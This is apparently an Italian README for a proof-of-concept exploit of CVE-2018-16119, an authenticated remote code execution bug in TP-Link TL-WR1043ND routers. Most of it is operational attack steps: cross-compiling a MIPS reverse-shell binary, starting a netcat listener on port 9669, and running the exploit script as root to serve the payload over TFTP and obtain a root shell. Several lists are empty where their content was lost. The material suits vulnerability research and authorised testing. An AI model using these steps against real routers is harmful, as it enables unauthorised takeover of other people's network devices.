
TP-Link TL-WR1043ND - Esecuzione remota di codice autenticata
CVE-2018-16119 è una vulnerabilità critica di esecuzione remota di codice autenticata che interessa i router TP-Link TL-WR1043ND. Questa vulnerabilità consente a un attaccante autenticato di eseguire comandi arbitrari sul dispositivo target con privilegi di root, portando potenzialmente al compromesso completo del sistema.
Dettagli CVE: CVE-2018-16119
Una volta sfruttata, un attaccante ottiene accesso alla shell di root del router, consentendogli di:
# Installa i pacchetti richiesti
sudo apt-get update
sudo apt-get install netcat docker.io
L'exploit richiede un binario reverse shell MIPS big-endian. Segui questi passaggi per compilarlo:
# Copia il codice sorgente in /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# Usa il container Docker con gli strumenti di cross-compilazione MIPS
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
All'interno del container Docker:
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
Esci da Docker e copia il binario compilato:
cp /tmp/shh exploit/tftp_server/
Apri un terminale e avvia un listener netcat sulla porta 9669:
Linux:
nc -l -p 9669 -vv
macOS:
nc -l 9669 -vv
Esegui lo script exploit con privilegi di root (richiesti per il server TFTP):
sudo python3 exploit/exploit.py
Lo script:
Una volta stabilita la connessione:
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # Script exploit principale
│ ├── requirements.txt # Dipendenze Python
│ ├── notes.txt # Note aggiuntive
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # Codice sorgente reverse shell
│ └── shh # Binario MIPS compilato
├── firmware/
│ └── wr740nv4_webrevert.bin # Firmware di esempio
├── squashfs-root/ # Filesystem firmware estratto
└── README.md # Questo file
Questa vulnerabilità è stata divulgata in modo responsabile e dovrebbe essere utilizzata solo per:
⚠️ ATTENZIONE: Questo exploit è fornito esclusivamente a scopo educativo e per test autorizzati. L'accesso non autorizzato a sistemi informatici è illegale e non etico. Gli utenti sono responsabili di assicurarsi di avere la dovuta autorizzazione prima di utilizzare questo strumento.
Installa i requisiti Python:
pip3 install -r exploit/requirements.txt
Permesso Negato per il Server TFTP:
Connessione Fallita:
Nessuna Risposta dalla Shell:
id o pwdQuesta ricerca dimostra gravi falle di sicurezza nel firmware dei dispositivi embedded. La vulnerabilità evidenzia l'importanza di:
Ricerca di: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi
Questa ricerca è stata condotta a scopo educativo e per migliorare la sicurezza dei sistemi embedded. Si prega di usarla in modo responsabile.